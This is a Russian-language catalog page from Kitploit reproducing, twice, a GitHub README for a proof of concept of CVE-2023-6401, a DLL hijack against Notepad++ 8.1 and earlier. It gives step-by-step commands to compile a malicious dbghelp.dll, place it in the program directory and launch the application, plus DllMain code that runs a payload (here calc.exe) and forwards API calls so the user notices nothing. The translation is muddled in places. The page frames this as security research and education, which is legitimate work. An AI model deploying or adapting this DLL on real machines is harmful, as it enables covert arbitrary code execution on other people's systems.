Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-6401 — CVE-2023-6401 — это уязвимость перехвата DLL, которая позволяет злоумышленникам выполнять произвольный код, размещая вредоносный файл `dbghelp.dll` в каталоге приложения. Этот проект демонстрирует уязвимость и предоставляет воспроизводимый PoC. | Kitploit
Инструменты/GitHubGitHub/mekitoci/cve-2023-6401
Анализ уязвимостейЭксплуатацияОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401 — это уязвимость перехвата DLL, которая позволяет злоумышленникам выполнять произвольный код, размещая вредоносный файл `dbghelp.dll` в каталоге приложения. Этот проект демонстрирует уязвимость и предоставляет воспроизводимый PoC.

Репозиторий
211 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-6401 · Доказательство концепции подмены DLL

License Platform

Английский | Китайский


Китайский

⚠️ Важное заявление: только для исследований в области безопасности и образовательных целей

Доказательство концепции уязвимости подмены DLL в NotePad++ ≤ 8.1. Выполнение произвольного кода путём размещения вредоносного dbghelp.dll в каталоге приложения.

Быстрый старт

# 下載專案
git clone https://github.com/mekitoci/CVE-2023-6401.git

# 進入專案目錄
cd CVE-2023-6401-main

# 編譯DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# 部署到NotePad++目錄
copy dbghelp.dll "C:\Program Files\Notepad++\"

# 執行測試
"C:\Program Files\Notepad++\notepad++.exe"

# 立即清理
del "C:\Program Files\Notepad++\dbghelp.dll"

Ожидаемый результат: всплывает калькулятор + отображается окно сообщения + NotePad++ запускается нормально

Результат PoC

Сведения об уязвимости

ПолеСведения
Номер CVECVE-2023-6401
Затронутые версииNotePad++ ≤ 8.1
Тип уязвимостиПодмена DLL / Перехват порядка поиска
ВоздействиеВыполнение произвольного кода
Предварительное условиеПраво на запись в каталог приложения

Принцип

Windows загружает DLL в следующем порядке:

  1. Каталог приложения (наивысший приоритет)
  2. Каталог System32
  3. Каталог Windows
  4. Текущий каталог
  5. Переменная среды PATH

При запуске NotePad++ загружает dbghelp.dll. Разместив вредоносную DLL с тем же именем в каталоге приложения, можно выполнить код до загрузки системной DLL.

Техническая реализация

Основной код

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // 執行惡意程式碼
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // 載入真實DLL並轉發API調用
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Ключевые особенности

  • Перехват порядка поиска: использует механизм поиска DLL в Windows
  • Переадресация API: загружает настоящую DLL и переадресует вызовы функций, сохраняя нормальную работу приложения
  • Скрытность: пользователь не замечает ничего необычного

Варианты компиляции

MinGW (рекомендуется)

gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Очистка

# 移除惡意DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# 確認移除
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "清理完成"

Справочные материалы

  • CVE-2023-6401
  • Порядок поиска DLL в Microsoft
  • MITRE ATT&CK T1574.001

Отказ от ответственности

Данный проект предназначен только для образовательных целей и исследований в области безопасности. Пользователи несут полную ответственность за соблюдение применимых законов и нормативных актов.


Английский

⚠️ ВАЖНОЕ ПРЕДУПРЕЖДЕНИЕ: Только для исследований в области безопасности и образовательных целей

Доказательство концепции уязвимости подмены DLL в NotePad++ ≤ 8.1. Выполнение произвольного кода путём размещения вредоносного dbghelp.dll в каталоге приложения.

Быстрый старт

# Clone the project
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Navigate to project directory
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Deploy to NotePad++ directory
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Execute test
"C:\Program Files\Notepad++\notepad++.exe"

# Immediate cleanup
del "C:\Program Files\Notepad++\dbghelp.dll"

Ожидаемый результат: всплывает калькулятор + отображается окно сообщения + NotePad++ запускается в обычном режиме

Результат PoC

Сведения об уязвимости

ПолеСведения
Номер CVECVE-2023-6401
Затронутые версииNotePad++ ≤ 8.1
Тип уязвимостиПодмена DLL / Перехват порядка поиска
ВоздействиеВыполнение произвольного кода
Предварительные условияПраво на запись в каталог приложения

Механизм

Windows загружает DLL в следующем порядке:

  1. Каталог приложения (наивысший приоритет)
  2. Каталог System32
  3. Каталог Windows
  4. Текущий каталог
  5. Переменная среды PATH

NotePad++ загружает dbghelp.dll при запуске. Разместив вредоносную DLL с тем же именем в каталоге приложения, можно выполнить код до загрузки системной DLL.

Техническая реализация

Основной код

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Execute malicious code
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Load real DLL and forward API calls
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Ключевые особенности

  • Перехват порядка поиска: использует механизм поиска DLL в Windows
  • Переадресация API: загружает настоящую DLL и переадресует вызовы функций, чтобы поддерживать нормальную работу приложения
  • Скрытность: пользователи не замечают никаких аномалий

Варианты компиляции

MinGW (рекомендуется)

gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Очистка

# Remove malicious DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# Confirm removal
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Cleanup completed"

Справочные материалы

  • CVE-2023-6401
  • Порядок поиска DLL в Microsoft
  • MITRE ATT&CK T1574.001

Отказ от ответственности

Этот проект предназначен только для образовательных целей и исследований в области безопасности. Пользователи несут исключительную ответственность за соблюдение применимых законов и нормативных актов.

Скачать инструмент